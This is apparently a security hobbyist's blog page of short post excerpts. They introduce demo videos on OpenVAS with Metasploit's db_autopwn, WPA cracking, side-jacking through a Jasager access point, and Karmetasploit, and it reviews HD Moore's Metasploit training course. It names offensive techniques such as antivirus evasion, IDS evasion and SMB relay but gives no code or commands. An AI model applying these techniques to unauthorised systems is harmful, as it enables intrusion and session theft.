the land of dookie

If you have ever been over-zealous in hardening a machine using GPOs and locked yourself out, you can use the NT Offline Password live CD to edit the registry presenting you with a system shell on reboot. Using this, you can edit the GPOs at will on the local machine.

Rather than sporting a green avatar on Twitter or elsewhere, how about setting up a Tor Relay or Bridge to really help out the Iranian people?

I couldn’t believe it when I saw that there wasn’t any real exposure of the fantastic OpenVas project.  For those that don’t know, when Nessus went commercial, OpenVas became an open source fork and has most of the same abilities as Nessus and best of all, it’s completely free.

I figured that a post only showing the setup and scanning with OpenVas would be pretty dull so I added in the usage of the resulting report in the always entertaining db_autopwn script in metasploit.

As I was uploading this video, I noticed the guys at hak5 just did a piece on coWPAtty.  Now don’t get me wrong, I like the work that hak5 does but sometimes you just want to cut to the chase.  I also do a few things a little differently.

Like a lot of people, I’m sure, after hearing about Jasager running on the fon, I hurried and got it running only to be left wondering what to do with it.

In this video, I demonstrate a side-jacking attack using Hamster and Ferret against a client connected via Jasager on my fon.

Maltego is a fantastic tool that doesn’t get nearly as much recognition as it should.  In the back|track4 edition of Maltego, the airgraph-ng wireless transforms are included which makes visualizing your data much easier.

I made this video to show just how easy it is to use the wireless transforms.

Since I haven’t run across any videos online showing Karmetasploit and what it can do, I decided to make one myself.

Karmetasploit on back|track4

I also put it up on that YouTube thing that all the kids are talking about:

I have been a big fan of metasploit for a number of years but I always
knew there was a lot that I could still learn about this fantastic
tool.  It was my good fortune, then, when I found out that one of the
dojos at CanSecWest was going to be “Metasploit – Asymmetric Warfare”
taught by none other than HD Moore himself.  I knew I had to attend.

If you’re looking to find out how to pop a bunch of boxes in a hurry,
this is not the course for you; there are plenty of YouTube videos
that can show you how to do that.  If, on the other hand, you want to
learn how metasploit is built and how it actually works, then you will
not be disappointed.  HD Moore will take you from metasploits humble
beginnings through to its current state today as one of the most
flexible and versatile exploitation tools available.

Upon entering class, you are given a USB stick with a BackTrack 4
virtual machine and a nearly (there were updates to the truck
overnight) up-to-date version of metasploit.  The USB stick was not
necessary or expected for me at least, but it was still very much
appreciated.  The class was also outfitted with a hardwired LAN so
grabbing the latest subversion was no problem and it provided an
excellent and fast network to scan.

The course starts off by detailing the architecture of metasploit,
where everything is located within the framework, and how it is all
put together.  I found this portion of the class to be particularly
valuable because I, like many people I’m sure, have really only used
metasploit as a quick tool to exploit victims without any real regard
for all of the bits and pieces that make it work.  Naturally, you
learn how to use exploits and payloads but you also spend a good deal
of time on the often neglected auxiliary modules within metasploit.
You even get to create a TCP scanner in one of the labs which really
cements how the framework is put together.

You learn a great deal about exploits, of course, but most
importantly, you learn how they are coded and why they are built the
way they are thus laying the foundation for your own exploit creation
if you’re so inclined.  You also create executables and encode them in
various ways in order to hide them from AV software.  HD spent a good
deal of time talking about my favorite feature of metasploit: the
meterpreter shell. I learned far more than I expected to in this
section and realised that I have only been scratching the surface of
what it is able to do.  The days content finshes off with client-side
exploits, karmetasploit, IDS evasion, IPv6, and SMB relay attacks.

The dojo is not, by any means, for the faint of heart.  The
prerequisites for the course ask for familiarity with metasploit and
ruby and you’d be well-served to ensure you meet with them.  There
were portions of the class where I wish that I had more experience
with ruby and programming in general.

HD Moore’s teaching style is excellent and he takes the time to ensure
that everyone is able to complete the lab portions of the class with
confidence.  It is clearly evident that HD knows metasploit inside out
and likes to share his knowledge with others.  I came away from this
training with a desire to learn even more which is, in my opinion, the
hallmark of a great course.  If ever you should have the opportunity
to take this, or the 2 day version of metasploit training, I highly
recommend it.